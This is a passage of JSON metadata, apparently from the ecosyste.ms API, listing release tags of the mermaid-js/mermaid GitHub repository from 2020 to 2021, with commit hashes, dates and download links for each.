/tar.gz/8.13.9","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.9/manifests"},{"name":"8.13.8","sha":"65592e0541790968703f16bc0b91a641b5443111","kind":"commit","published_at":"2021-12-28T16:31:35.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.8","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.8/manifests"},{"name":"8.13.7","sha":"52af0476c14be9f98d669e336a5625f5fb609aee","kind":"commit","published_at":"2021-12-22T20:20:19.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.7/manifests"},{"name":"8.13.6","sha":"a44714c715e49ff2dc86a401962dc5929b6eca06","kind":"commit","published_at":"2021-12-16T19:06:50.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.6/manifests"},{"name":"real-8.13.5","sha":"7da80812e0510ae04f9ebf3a151a048ef9ce6834","kind":"commit","published_at":"2021-12-08T06:53:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/real-8.13.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/real-8.13.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@real-8.13.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/real-8.13.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/real-8.13.5/manifests"},{"name":"8.13.5","sha":"2ce18ec2a8c6f6c2ece20f749628443ac663119f","kind":"commit","published_at":"2021-12-07T22:09:20.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.5/manifests"},{"name":"8.13.4","sha":"650bcef3d1f940aec0cf4b81d1433b74b5e0f55c","kind":"commit","published_at":"2021-11-18T16:11:17.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.4/manifests"},{"name":"8.13.3","sha":"0d7d5ddc5fbd8482dd7e907d3eef41cd1240f68f","kind":"commit","published_at":"2021-10-14T19:19:28.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.3/manifests"},{"name":"8.13.2","sha":"2758d6477803dd9e5e8975b0d93b33c69be7b377","kind":"commit","published_at":"2021-09-29T18:22:45.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.2/manifests"},{"name":"8.13.1","sha":"029042393c795b4b3ef9c91ae66564610e4b0c89","kind":"commit","published_at":"2021-09-29T18:05:05.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.1/manifests"},{"name":"8.13.0","sha":"75b79e1b23f288e4706f21f62925c17c676cf4c0","kind":"commit","published_at":"2021-09-29T06:45:07.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.0/manifests"},{"name":"8.12.1","sha":"48b6a32fe19af7e600fb0df900aa5956159e52d7","kind":"commit","published_at":"2021-08-26T17:43:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.12.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.12.1/manifests"},{"name":"8.12.0","sha":"296a64f465021a8424cd72d495a24f4cc3c59c1e","kind":"commit","published_at":"2021-08-26T17:32:05.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.12.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.12.0/manifests"},{"name":"8.11.5","sha":"962998810bccd537365f7de45891ebba48487cde","kind":"commit","published_at":"2021-08-15T15:41:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.5/manifests"},{"name":"8.11.4","sha":"a670b678445f2894844ecbe7352f994396caa518","kind":"commit","published_at":"2021-08-05T17:58:47.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.4/manifests"},{"name":"8.11.3","sha":"af7f5d0aaf3ede2f2efca6f24ec527c4e7065e2f","kind":"commit","published_at":"2021-08-04T17:25:59.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.3/manifests"},{"name":"8.11.2","sha":"9245b0bb8b82c200c7c7a277cd619db6e5dd7715","kind":"commit","published_at":"2021-07-29T17:34:51.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.2/manifests"},{"name":"8.11.1","sha":"33e8ee6c0e8bfd03f5d3fee51237a156c2e5a537","kind":"commit","published_at":"2021-07-28T13:54:24.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.1/manifests"},{"name":"untagged-78173a5e15ffdf8f1e6a","sha":"52b1b23d4753a3d068e19052e5f4d25e88057517","kind":"commit","published_at":"2021-07-15T12:54:54.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-78173a5e15ffdf8f1e6a","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-78173a5e15ffdf8f1e6a","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-78173a5e15ffdf8f1e6a","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-78173a5e15ffdf8f1e6a","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-78173a5e15ffdf8f1e6a/manifests"},{"name":"8.11.0-rc2","sha":"1d782678715699e8485480bff309adc2b648c7c1","kind":"commit","published_at":"2021-06-27T05:57:35.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.0-rc2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.0-rc2/manifests"},{"name":"8.11.0","sha":"eef4ef54a177c96b0efcf1c8c98f8d4d9f454e00","kind":"commit","published_at":"2021-06-25T10:27:21.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.0/manifests"},{"name":"untagged-f83ec2a9deaf6677e0c7","sha":"e6e94ad57ea06ef8627bf91ddfbd88f5082952bf","kind":"commit","published_at":"2021-06-05T10:11:13.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-f83ec2a9deaf6677e0c7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-f83ec2a9deaf6677e0c7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-f83ec2a9deaf6677e0c7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-f83ec2a9deaf6677e0c7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-f83ec2a9deaf6677e0c7/manifests"},{"name":"8.10.1","sha":"417428aceada045eabcc92826c68e08a1329c98f","kind":"commit","published_at":"2021-05-10T16:14:47.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.10.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.10.1/manifests"},{"name":"8.9.3","sha":"8b3ac57ce7e6ae6ea4a66a9d8a28d8fcde936bb9","kind":"commit","published_at":"2021-04-25T11:24:35.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.9.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.3/manifests"},{"name":"untagged-502e9410f3e7fd2ed484","sha":"45918da48ec99a706aa2b39598ae32cdccf95004","kind":"commit","published_at":"2021-04-25T10:27:59.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-502e9410f3e7fd2ed484","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-502e9410f3e7fd2ed484","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-502e9410f3e7fd2ed484","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-502e9410f3e7fd2ed484","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-502e9410f3e7fd2ed484/manifests"},{"name":"8.9.2","sha":"a5cc75c1f7b722ebd0c2f848b25e2350655841dd","kind":"commit","published_at":"2021-03-18T20:02:49.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.9.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.2/manifests"},{"name":"8.9.1","sha":"be95b93a2d91d62bc8618b906356514232b4343d","kind":"commit","published_at":"2021-02-18T20:41:01.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.9.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.1/manifests"},{"name":"8.9.0","sha":"3c5da00230a586843364ff55f909fe27be2c0b41","kind":"tag","published_at":"2021-01-21T18:49:59.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.9.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.0/manifests"},{"name":"v8.8.4","sha":"d6b2bcf0d23af89f65de659d2d7edd32a41ccddc","kind":"tag","published_at":"2020-12-05T13:43:29.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v8.8.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v8.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v8.8.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v8.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v8.8.4/manifests"},{"name":"8.8.3","sha":"e3cf8b78437bb542029e91a022c81fbd4d361e6a","kind":"commit","published_at":"2020-11-05T19:09:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.8.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.3/manifests"},{"name":"8.8.2","sha":"0f9da18cbe9bea6021ab78553902e5a1a517d61a","kind":"commit","published_at":"2020-10-08T17:48:33.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.8.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.2/manifests"},{"name":"8.8.1","sha":"4dc805d25add19ae07ac9fe8951b4036332e0530","kind":"commit","published_at":"2020-09-30T17:23:42.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.8.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.1/manifests"},{"name":"8.8.0","sha":"0918b97e815ad77e8b8e88ebb52400937f197885","kind":"commit","published_at":"2020-09-05T07:46:24.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.8.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.0/manifests"},{"name":"8.7.0","sha":"4c38b1a776d83a00e12dd820b1bee455c3954e3c","kind":"commit","published_at":"2020-08-09T12:03:20.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.7.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.7.0/manifests"},{"name":"8.6.4","sha":"95b7e4f9adc560dfd2ec6cc2b1f43397b2641012","kind":"commit","published_at":"2020-07-26T12:09:48.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.6.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.4/manifests"},{"name":"8.6.3","sha":"d12b197ec951fa74574b4ef9fb95a55881cdd7a9","kind":"commit","published_at":"2020-07-24T06:28:14.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.6.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.3/manifests"},{"name":"8.6.2","sha":"f68536357415d16b239e04a98e6195227399557e","kind":"commit","published_at":"2020-07-22T17:22:02.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.6.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.2/manifests"},{"name":"8.6.0","sha":"b4203992bf98c209a578b1139c44d107b708ca6c","kind":"commit","published_at":"2020-07-13T14:42:10.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.6.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.0/manifests"},{"name":"8.5.2","sha":"e9e5c75decbd5f5bdcf6c9d63c8f8f553263f6e2","kind":"commit","published_at":"2020-06-07T08:39:21.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.5.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.5.2/manifests"},{"name":"8.5.1","sha":"9470a4f1edc0d0d5b8398e2c41029895fa5f738a","kind":"tag","published_at":"2020-05-17T08:12:15.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.5.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.5.1/manifests"},{"name":"untagged-566ebfbf21141b604025","sha":"0ac48a431a319b2ff7aaaef889ddd53f153acc6d","kind":"commit","published_at":"2020-05-13T17:32:56.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-566ebfbf21141b604025","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-566ebfbf21141b604025","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-566ebfbf21141b604025","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-566ebfbf21141b604025","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-566ebfbf21141b604025/manifests"},{"name":"untagged-31c93788afe260d914bb","sha":"5bdffd7d20c5622540c691ba63f635b8eedabf40","kind":"commit","published_at":"2020-04-11T16:10:53.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-31c93788afe260d914bb","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-31c93788afe260d914bb","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-31c93788afe260d914bb","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-31c93788afe260d914bb","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-31c93788afe260d914bb/manifests"},{"name":"8.4.8","sha":"1c07e550bb5fee590f69a1f7892e481a2cf53cff","kind":"commit","published_at":"2020-02-21T09:23:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.8","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.8/manifests"},{"name":"untagged-7651dabb407ecd5631ce","sha":"98229a47b298f4124d88347edbd56357866df7ee","kind":"commit","published_at":"2020-02-16T11:46:23.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-7651dabb407ecd5631ce","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-7651dabb407ecd5631ce","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-7651dabb407ecd5631ce","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-7651dabb407ecd5631ce","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-7651dabb407ecd5631ce/manifests"},{"name":"8.4.6","sha":"4805394e612c836bf27710794ce6f9aa86b7ac60","kind":"tag","published_at":"2020-01-22T18:53:54.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.6","dependencies_parsed_at":null,"dependency_jo